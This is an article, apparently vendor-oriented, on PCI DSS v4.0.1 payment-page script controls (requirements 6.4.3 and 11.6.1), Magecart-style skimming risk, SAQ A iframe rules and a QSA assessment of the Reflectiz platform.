Sansec has counted more than 100,000 sites hit by web skimming and supply-chain attacks.
Magecart and the crowded checkout page
When a customer types their card number into a checkout, the browser usually runs far more than the merchant’s own code. Analytics tags, tag managers, support widgets and payment iframes mean a modern checkout can load dozens of third‑party scripts — and any one of those scripts can be turned into a skimmer. That is how Magecart-style attacks operate: attackers compromise a third‑party vendor and the malicious payload rides in on a script the merchant has already been running. Nothing on the page looks new; the script’s behavior changes.
PCI DSS v4.0.1 requirements 6.4.3 and 11.6.1 — what they demand
PCI DSS v4.0.1 addresses this specific gap with two requirements now fully in force. Requirement 6.4.3 requires merchants to inventory every payment‑page script, authorize it, and prove its integrity. Requirement 11.6.1 requires detection of tampering with page content and HTTP headers as the browser receives them. Taken together, the controls move the standard beyond static file checks toward detection of malicious behavior at the page level.
That is a nontrivial operational lift: Reflectiz observed that roughly 30% of payment‑page scripts change within any two‑week window, and a manual, page‑by‑page process does not scale across hundreds of frequently changing third‑party assets.
Integrity360 Europe’s QSA assessment of the Reflectiz PCI DSS Platform
Integrity360 Europe, a PCI Qualified Security Assessor and a member of the PCI SSC Global Executive Assessor Roundtable, reviewed the Reflectiz PCI DSS Platform against requirements 6.4.3 and 11.6.1 and judged it capable of effectively supporting compliance. The assessor highlighted three practical capabilities:
- Behavioral detection rather than only file hashes — Reflectiz watches script behavior and can catch a script the moment it begins to reach for card data, whereas a hash check can miss a vendor‑side swap that does not change the delivered filename.
- Agentless deployment — the platform requires no code changes or snippets, can be operational in days, and continues to function through refactors and CMS migrations.
- QSA‑ready evidence in one click — the platform produces a full audit trail per page suitable for assessment, according to the QSA review.
SAQ A, iframes, and PCI SSC FAQ #1588
Since January 2025, merchants filing the SAQ A self‑assessment questionnaire may omit controls 6.4.3 and 11.6.1 only if they confirm their site is not susceptible to script attacks. The assessment guidance notes that a full redirect to a payment processor generally meets that condition. But merchants that embed a payment iframe must still consider exposure on the parent page: a script running on the parent page can hijack the checkout before data reaches the secure frame, and the merchant must demonstrate that this cannot occur. PCI SSC FAQ #1588 directs merchants back to the same controls.
What this means for technologists, procurement leaders, and QSAs
- Technologists and security teams: the record from the QSA review emphasizes behavioral monitoring rather than static hashes — teams will need approaches that detect when a previously trusted script begins to access card data, because roughly 30% of payment‑page scripts change within two weeks.
- Merchants and procurement leaders: the SAQ A carve‑out narrows the circumstances where controls can be omitted, and iframe merchants must produce proof that parent‑page scripts cannot exfiltrate payment data. Inventorying and authorizing every payment‑page script — and retaining evidence — becomes a procurement as well as a technical task.
- QSAs and the PCI SSC community: Integrity360 Europe’s assessment and the accompanying white paper are positioned as blueprints for producing the evidence QSAs will expect — a line‑by‑line breakdown of the controls, a monitoring workflow, and specifics of what SAQ A now requires of iframe merchants.
The practical upshot is crisp: checkout pages are now explicitly within the perimeter that PCI DSS treats as security‑critical, and the new controls aim to catch behavioral changes that static checks miss. For organizations wrestling with hundreds of changing third‑party scripts, the Integrity360 review says an agentless, behavior‑focused platform can provide both detection and the audit trail a QSA will seek. The complete Integrity360 Europe white paper details both requirements line by line, the monitoring workflow, and exactly what SAQ A now demands of iframe merchants.
